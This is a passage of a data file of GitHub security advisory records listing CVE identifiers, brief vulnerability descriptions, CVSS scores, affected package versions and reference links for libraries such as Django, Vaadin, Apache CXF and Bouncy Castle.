[{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-58f5-hfqc-jgch'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29443'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose'}]","{'cwe_ids': ['CWE-203', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:01:38Z', 'nvd_published_at': '2021-04-16T18:15:00Z'}" +1.4.0,GHSA-7jgj-8wvc-jh57,2021-04-21T19:15:50Z,2021-04-21T19:16:06Z,,['CVE-2018-8292'],.NET Core Information Disclosure,"An information disclosure vulnerability exists in .NET Core when authentication information is inadvertently exposed in a redirect, aka "".NET Core Information Disclosure Vulnerability."" This affects .NET Core 2.1, .NET Core 1.0, .NET Core 1.1, PowerShell Core 6.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Net.Http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-8292'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/88'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2018:2902'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8292'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/105548'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:15:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-6hrm-jqp3-64cv,2023-01-26T22:35:31Z,2021-04-13T15:42:36Z,,['CVE-2020-24393'],Improper Certificate Validation in TweetStream,TweetStream 2.6.1 uses the library eventmachine in an insecure way that does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'tweetstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24393'}, {'type': 'PACKAGE', 'url': 'https://github.com/tweetstream/tweetstream'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-096-tweetstream-tweetstream'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:54:38Z', 'nvd_published_at': '2021-02-19T23:15:00Z'}" +1.4.0,GHSA-qg7c-q3vq-rgxr,2021-04-12T22:32:54Z,2021-04-13T15:13:26Z,,[],Leak of information via Store-API aggregations in shopware/platform and shopware/core,"### Impact + +Leak of information via Store-API + +### Patches +We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-qg7c-q3vq-rgxr'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:32:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-8hw9-22v6-9jr9,2021-04-16T23:04:15Z,2021-04-19T15:14:33Z,,['CVE-2021-29452'],Any logged in user could edit any other logged in user.,"### Impact +Everyone who is running a12n-server. + +A new HAL-Form was added to allow editing users. This feature should only have been accessible to admins. Unfortunately, privileges were incorrectly checked allowing any logged in user to make this change. + +### Patches +Patched in v0.18.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@curveball/a12n-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/curveball/a12n-server/security/advisories/GHSA-8hw9-22v6-9jr9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29452'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@curveball/a12n-server'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:04:15Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}" +1.4.0,GHSA-4vp3-vfww-8648,2021-04-09T22:11:38Z,2021-04-13T15:48:05Z,,['CVE-2020-29454'],Incorrect permission enforcement in UmbracoCms,Editors/LogViewerController.cs in Umbraco through 8.9.1 allows a user to visit a logviewer endpoint even if they lack Applications.Settings access.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoCms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29454'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/pull/9361'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T22:11:38Z', 'nvd_published_at': '2020-12-02T02:15:00Z'}" +1.4.0,GHSA-35mm-cc6r-8fjp,2023-08-08T15:34:06Z,2021-04-07T20:58:47Z,,['CVE-2020-8264'],Cross-site scripting in actionpack,"In actionpack gem >= 6.0.0, a possible XSS vulnerability exists when an application is running in development mode allowing an attacker to send or embed (in another page) a specially crafted URL which can allow the attacker to execute JavaScript in the context of the local application. This vulnerability is in the Actionable Exceptions middleware. + +Workarounds +----------- +Until such time as the patch can be applied, application developers should disable the Actionable Exceptions middleware in their development environment via a line such as this one in their config/environment/development.rb: `config.middleware.delete ActionDispatch::ActionableExceptions`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8264'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/904059'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8264.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/yQzUVfv42jk/m/oJWw-xhNAQAJ'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:19:13Z', 'nvd_published_at': '2021-01-06T21:15:00Z'}" +1.4.0,GHSA-25xc-jwfq-39jw,2022-08-15T20:03:44Z,2021-04-19T14:50:49Z,,['CVE-2021-31407'],OSGi applications using Vaadin 12-14 and 19 vulnerable to server classes and resources exposure,"Vulnerability in OSGi integration in `com.vaadin:flow-server` versions 1.2.0 through 2.4.7 (Vaadin 12.0.0 through 14.4.9), and 6.0.0 through 6.0.1 (Vaadin 19.0.0) allows attacker to access application classes and resources on the server via crafted HTTP request. + +- https://vaadin.com/security/cve-2021-31407","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '2.4.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.4.7'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.1'}]}], 'versions': ['6.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-25xc-jwfq-39jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31407'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/osgi/issues/50'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10229'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10269'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31407'}]","{'cwe_ids': ['CWE-402', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:42Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-64x2-gq24-75pv,2021-04-20T22:19:53Z,2021-04-22T16:15:23Z,,['CVE-2020-13954'],Cross-site scripting in Apache CXF,"By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13954'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cdev.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51fdd73548290b2dfd0b48f7ab69bf9ae064dd100364cd8a15f0b3ec@%3Cusers.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r640719c9ce5671f239a6f002c20e14062effe4b318a580b6746aa5ef@%3Cdev.syncope.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r81a41a2915985d49bc3ea57dde2018b03584a863878a8532a89f993f@%3Cusers.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0010/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://cxf.apache.org/security-advisories.data/CVE-2020-13954.txt.asc?version=1&modificationDate=1605183670659&api=v2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/11/12/2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:19:53Z', 'nvd_published_at': '2020-11-12T13:15:00Z'}" +1.4.0,GHSA-h8hx-2c5r-32cf,2021-04-13T17:01:38Z,2021-04-13T17:01:50Z,,['CVE-2021-29435'],Cross-Site Request Forgery (CSRF) in trestle-auth,"### Impact +A vulnerability in trestle-auth versions 0.4.0 and 0.4.1 allows an attacker to create a form that will bypass Rails' built-in CSRF protection when submitted by a victim with a trestle-auth admin session. This potentially allows an attacker to alter protected data, including admin account credentials. + +### Patches +The vulnerability has been fixed in trestle-auth 0.4.2 released to RubyGems. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [trestle-auth](https://github.com/TrestleAdmin/trestle-auth/issues) +* Email the maintainer at [sam@sampohlenz.com](mailto:sam@sampohlenz.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'trestle-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TrestleAdmin/trestle-auth/security/advisories/GHSA-h8hx-2c5r-32cf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29435'}, {'type': 'WEB', 'url': 'https://github.com/TrestleAdmin/trestle-auth/commit/cb95b05cdb2609052207af07b4b8dfe3a23c11dc'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/trestle-auth/CVE-2021-29435.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/trestle-auth'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T17:01:38Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}" +1.4.0,GHSA-c6c4-7x48-4cqp,2021-10-08T21:24:15Z,2021-04-19T14:47:47Z,,[],"Timing side channel vulnerability in UIDL request handler in Vaadin 10, 11-14, and 15-18","Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:flow-server` versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack. + +- https://vaadin.com/security/cve-2021-31404","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '18.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-c6c4-7x48-4cqp'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31404'}]","{'cwe_ids': ['CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:13:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-67mm-m3wx-j7fr,2022-04-27T19:13:33Z,2021-04-13T15:15:29Z,,['CVE-2021-26541'],Command injection in gitlog,The gitlog function in src/index.ts in gitlog before 4.0.4 has a command injection vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gitlog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26541'}, {'type': 'WEB', 'url': 'https://github.com/domharrington/node-gitlog/pull/65'}, {'type': 'WEB', 'url': 'https://github.com/domharrington/node-gitlog/pull/65/commits/bb22ffb2c907e0284f887ab625e12b88c31f4bf4'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2020-4301'}, {'type': 'PACKAGE', 'url': 'https://github.com/domharrington/node-gitlog'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/gitlog'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:05:05Z', 'nvd_published_at': '2021-02-08T17:15:00Z'}" +1.4.0,GHSA-qr9h-vr5p-pwwx,2022-04-18T21:56:34Z,2021-04-12T18:59:11Z,,['CVE-2020-27543'],Denial of Service (DoS) in restify-paginate,The restify-paginate package 0.0.5 for Node.js allows remote attackers to cause a Denial-of-Service by omitting the HTTP Host header. A Restify-based web service would crash with an uncaught exception.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'restify-paginate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27543'}, {'type': 'PACKAGE', 'url': 'https://github.com/paulvarache/restify-paginate/'}, {'type': 'WEB', 'url': 'https://github.com/secoats/cve/tree/master/CVE-2020-27543_dos_restify-paginate'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210401-0002/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/restify-paginate'}]","{'cwe_ids': ['CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:43:59Z', 'nvd_published_at': '2021-02-25T17:15:00Z'}" +1.4.0,GHSA-mm4f-47ch-f7hx,2022-07-05T18:00:53Z,2021-04-13T15:32:43Z,,['CVE-2021-23363'],Arbitrary code execution in kill-by-port,"This affects the package kill-by-port before 0.0.2. If (attacker-controlled) user input is given to the killByPort function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-by-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23363'}, {'type': 'WEB', 'url': 'https://github.com/GuyMograbi/kill-by-port/commit/ea5b1f377e196a4492e05ff070eba8b30b7372c4'}, {'type': 'PACKAGE', 'url': 'https://github.com/GuyMograbi/kill-by-port'}, {'type': 'WEB', 'url': 'https://github.com/GuyMograbi/kill-by-port/blob/16dcbe264b6b4a5ecf409661b42836dd286fd43f/index.js#23L8'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLBYPORT-1078531'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:18:57Z', 'nvd_published_at': '2021-03-30T15:15:00Z'}" +1.4.0,GHSA-c9g6-9335-x697,2021-04-06T21:47:25Z,2021-04-13T15:27:51Z,,['CVE-2020-7693'],Improper Input Validation in SocksJS-Node,Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'sockjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7693'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/issues/252'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/pull/265'}, {'type': 'WEB', 'url': 'https://github.com/sockjs/sockjs-node/commit/dd7e642cd69ee74385825816d30642c43e051d16'}, {'type': 'WEB', 'url': 'https://github.com/andsnw/sockjs-dos-py'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575448'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SOCKJS-575261'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/sockjs'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:47:25Z', 'nvd_published_at': '2020-07-09T14:15:00Z'}" +1.4.0,GHSA-m496-x567-f98c,2021-04-30T20:19:58Z,2021-04-22T16:10:49Z,,['CVE-2021-21426'],Fixes a bug in Zend Framework's Stream HTTP Wrapper,"### Impact +CVE-2021-3007: Backport of Zend_Http_Response_Stream, added certain type checking as a way to prevent exploitation. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007 + +This vulnerability is caused by the unsecured deserialization of an object. In versions higher than Zend Framework 3.0.0, the attacker abuses the Zend3 feature that loads classes from objects in order to upload and execute malicious code in the server. The code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the “callbackOptions” array. + + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ +v20.0.9 v19.4.13","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.4.12'}}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 20.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21426'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:16:53Z', 'nvd_published_at': '2021-04-21T21:15:00Z'}" +1.4.0,GHSA-xgxc-v2qg-chmh,2021-04-30T20:43:54Z,2021-04-08T18:11:48Z,,['CVE-2021-28658'],Directory Traversal in Django,"In Django 2.2 before 2.2.20, 3.0 before 3.0.14, and 3.1 before 3.1.8, MultiPartParser allowed directory traversal via uploaded files with suitably crafted file names. Built-in upload handlers were not affected by this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.20'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.14'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28658'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/django-announce/c/ePr5j-ngdPU'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVKYPHR3TKR2ESWXBPOJEKRO2OSJRZUE/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Django/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0001/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/apr/06/security-releases/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T18:11:26Z', 'nvd_published_at': '2021-04-06T15:15:00Z'}" +1.4.0,GHSA-9w49-m7xh-5r39,2021-04-09T21:59:25Z,2021-04-20T16:37:56Z,,['CVE-2020-29456'],Cross-site scripting in papermerge,"Multiple cross-site scripting (XSS) vulnerabilities in Papermerge before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the rename, tag, upload, or create folder function. The payload can be in a folder, a tag, or a document's filename. If email consumption is configured in Papermerge, a malicious document can be sent by email and is automatically uploaded into the Papermerge web application. Therefore, no authentication is required to exploit XSS if email consumption is configured. Otherwise authentication is required.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'papermerge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29456'}, {'type': 'WEB', 'url': 'https://github.com/ciur/papermerge/issues/228'}, {'type': 'WEB', 'url': 'https://github.com/ciur/papermerge/releases/tag/v1.5.2'}, {'type': 'WEB', 'url': 'https://www.papermerge.com/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:59:25Z', 'nvd_published_at': '2020-12-02T08:15:00Z'}" +1.4.0,GHSA-73xv-w5gp-frxh,2022-02-08T22:01:10Z,2021-04-30T16:14:15Z,,['CVE-2020-28052'],Logic error in Legion of the Bouncy Castle BC Java,"An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15to18'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15on'}, 'ranges': 